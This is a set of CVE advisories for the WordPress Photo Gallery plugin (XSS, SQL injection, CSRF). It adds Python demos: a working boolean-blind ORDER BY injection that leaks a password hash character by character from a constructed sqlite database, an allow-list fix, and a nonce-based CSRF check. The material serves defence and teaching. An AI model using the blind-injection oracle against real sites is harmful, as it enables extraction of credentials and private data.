CVE-2015-1394 – Photo Gallery by 10Web <= 1.2.10 - Authenticated Cross-Site Scripting
https://notcve.org/view.php?id=CVE-2015-1394
Multiple cross-site scripting (XSS) vulnerabilities in the Photo Gallery plugin before 1.2.11 for WordPress allow remote authenticated users to inject arbitrary web script or HTML via the (1) sort_by, (2) sort_order, (3) items_view, (4) dir, (5) clipboard_task, (6) clipboard_files, (7) clipboard_src, or (8) clipboard_dest parameters in an addImages action to wp-admin/admin-ajax.php. A separate advisory reports version 1.2.8 as affected by the same cross-site scripting issue. Fixed in 1.2.11 (see the linked changesets).
References:
  http://www.securityfocus.com/archive/1/archive/1/534568/100/0/threaded
  https://plugins.trac.wordpress.org/changeset/1073334
  https://plugins.trac.wordpress.org/changeset/1076678/photo-gallery
  https://seclists.org/bugtraq/2015/Jan/140
  https://wordpress.org/plugins/photo-gallery/changelog
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVE-2015-1393 – Photo Gallery by 10Web <= 1.2.10 - Authenticated SQL Injection via asc_or_desc Parameter
https://notcve.org/view.php?id=CVE-2015-1393
SQL injection vulnerability in the Photo Gallery plugin before 1.2.11 for WordPress allows remote authenticated users to execute arbitrary SQL commands via the asc_or_desc parameter in a create gallery request on the galleries_bwg page of wp-admin/admin.php. A separate advisory reports version 1.2.8 as affected by the same remote SQL injection issue. Fixed in 1.2.11 (see the linked changeset).
References:
  http://www.securityfocus.com/archive/1/534569/100/0/threaded
  https://plugins.trac.wordpress.org/changeset/1074134/photo-gallery
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVE-2015-1055 – Photo Gallery by 10Web <= 1.2.7 - Unauthenticated Blind SQL Injection via order_by Parameter
https://notcve.org/view.php?id=CVE-2015-1055
SQL injection vulnerability in the Photo Gallery plugin 1.2.7 for WordPress allows remote, unauthenticated attackers to execute arbitrary SQL commands via the order_by parameter in a GalleryBox action to wp-admin/admin-ajax.php. Because the injection point is a sort expression, the advisory classifies it as blind injection. Fixed in 1.2.8.
References:
  http://seclists.org/fulldisclosure/2015/Jan/36
  http://www.securityfocus.com/bid/72015
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
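The two SQL injection entries above (CVE-2015-1393 via asc_or_desc, CVE-2015-1055 via order_by) share one root cause: a request-controlled sort column and sort direction are spliced into the ORDER BY clause. Prepared-statement placeholders do not help there, because identifiers and keywords cannot be bound as values; the fix is an allow-list. The Python/sqlite3 example below is added here and is not the plugin's code: the tables, rows, function names, the CASE-based oracle and the password-hash string are all constructed for the demonstration. It shows how a boolean condition placed in ORDER BY leaks data one character at a time (the "blind" variant named in the CVE-2015-1055 title) and the allow-listed form that neutralises the same input.

```python
import sqlite3

# Constructed schema and data for the demonstration; not the plugin's tables.
SAMPLE_SQL = """
CREATE TABLE galleries (id INTEGER PRIMARY KEY, name TEXT, "order" INTEGER);
CREATE TABLE wp_users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO galleries VALUES (1, 'Summer', 2), (2, 'Winter', 1), (3, 'Spring', 3);
INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedHashValue');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SQL)
    return conn


def list_galleries_vulnerable(conn, order_by, asc_or_desc):
    """Vulnerable pattern: the sort column and direction from the request are
    concatenated straight into ORDER BY. Placeholders cannot fix this, since
    SQL identifiers and keywords are not bindable values."""
    sql = f"SELECT id, name FROM galleries ORDER BY {order_by} {asc_or_desc}"
    return conn.execute(sql).fetchall()


def blind_oracle(conn, condition):
    """Boolean-blind probe: sort by id when CONDITION holds and by -id
    otherwise, so the id of the first row returned reveals the truth value
    without any error message or data being displayed directly."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    rows = list_galleries_vulnerable(conn, payload, "ASC")
    return rows[0][0] == 1


def leak_char(conn, position,
              alphabet="$PBabcdefghijklmnopqrstuvwxyzACDEFGHIJKLMNOQRSTUVWXYZ0123456789./"):
    """Recover one character of the admin password hash through the oracle,
    one yes/no question per candidate character."""
    for ch in alphabet:
        cond = (f"(SELECT substr(user_pass, {position}, 1) FROM wp_users "
                f"WHERE id = 1) = '{ch}'")
        if blind_oracle(conn, cond):
            return ch
    return None


# Hardened form: only identifiers the application itself names may reach SQL.
ALLOWED_SORT_COLUMNS = {"id", "name", "order"}


def list_galleries_hardened(conn, order_by, asc_or_desc):
    """Map request values onto a fixed allow-list, then splice only the
    allow-listed identifier (quoted) and a literal ASC/DESC keyword.
    Anything else silently falls back to the default ordering."""
    column = order_by if order_by in ALLOWED_SORT_COLUMNS else "id"
    direction = "DESC" if str(asc_or_desc).lower() == "desc" else "ASC"
    sql = f'SELECT id, name FROM galleries ORDER BY "{column}" {direction}'
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    leaked = "".join(leak_char(db, i) or "?" for i in range(1, 5))
    print("vulnerable endpoint leaks hash prefix:", leaked)
    probe = "(CASE WHEN 1=1 THEN id ELSE -id END)"
    print("hardened endpoint ignores the probe:", list_galleries_hardened(db, probe, "ASC"))
```

The hardened function is deliberately strict about the direction too: a value that is not exactly "desc" becomes ASC, so the asc_or_desc parameter can never carry anything but one of two keywords into the statement.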
CVE-2015-9380 – Photo Gallery by 10Web <= 1.2.41 - Cross-Site Request Forgery
https://notcve.org/view.php?id=CVE-2015-9380
The Photo Gallery plugin before 1.2.42 for WordPress is vulnerable to cross-site request forgery (CSRF); the advisory gives no further detail on the affected action. Fixed in 1.2.42.
References:
  https://wordpress.org/plugins/photo-gallery/#developers
  https://wordpress.org/support/topic/this-plugin-is-reported-as-vulnerable
  https://wpvulndb.com/vulnerabilities/7225
CWE-352: Cross-Site Request Forgery (CSRF)
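The CSRF entry above records only the fixed version. In a WordPress plugin the standard defence for a state-changing admin action is a nonce that is bound to the acting user, to the specific action and to a time window, generated for the form or link and verified before the action runs. The Python below is an added, self-contained model of that check; it is not the plugin's or WordPress's own code. The secret, the 12-hour lifetime, the request dictionaries and the delete_gallery action name are assumptions constructed for the demonstration.

```python
import hashlib
import hmac
import time

# Constructed secret standing in for a site's nonce key and salt (assumption).
NONCE_SECRET = b"constructed-demo-secret-not-for-real-use"
NONCE_LIFE = 12 * 60 * 60  # seconds; 12 hours is WordPress's default nonce lifetime


def nonce_tick(now=None):
    """Time bucket of half the lifetime: a token issued in bucket N is
    accepted in buckets N and N+1, so it lives between 12 and 24 hours."""
    now = time.time() if now is None else now
    return int(now // (NONCE_LIFE / 2))


def create_nonce(action, user_id, now=None):
    """Bind the token to the time bucket, the specific action and the user.
    A token for another user or another action will not verify."""
    msg = f"{nonce_tick(now)}|{action}|{user_id}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()[:16]


def verify_nonce(nonce, action, user_id, now=None):
    """Return 1 for a token from the current bucket, 2 for one from the
    previous bucket (still accepted), 0 otherwise. Comparison is constant-time."""
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        msg = f"{t}|{action}|{user_id}".encode()
        expected = hmac.new(NONCE_SECRET, msg, hashlib.sha256).hexdigest()[:16]
        if hmac.compare_digest(expected, str(nonce)):
            return age
    return 0


def handle_delete_gallery(request, session_user_id, galleries, now=None):
    """Constructed state-changing admin action. session_user_id comes from
    the cookie the browser attaches automatically, which is exactly what a
    cross-site forged request rides on; the nonce is the value the forging
    site cannot read or compute, so it is what the check must key on."""
    gallery_id = request.get("id")
    action = f"delete_gallery_{gallery_id}"
    if not verify_nonce(request.get("_wpnonce", ""), action, session_user_id, now):
        return 403, "missing or invalid nonce"
    galleries.pop(gallery_id, None)
    return 200, "deleted"


if __name__ == "__main__":
    t = 1_700_000_000
    store = {7: "Summer"}
    token = create_nonce("delete_gallery_7", user_id=1, now=t)
    # Forged cross-site request: the victim's cookie is present, the nonce is not.
    print(handle_delete_gallery({"id": 7}, 1, store, now=t))
    # Legitimate request from the plugin's own admin page carrying the nonce.
    print(handle_delete_gallery({"id": 7, "_wpnonce": token}, 1, store, now=t))
```

The nonce is a CSRF defence only; it is not a substitute for a capability check on the acting user, which the handler above assumes has already happened.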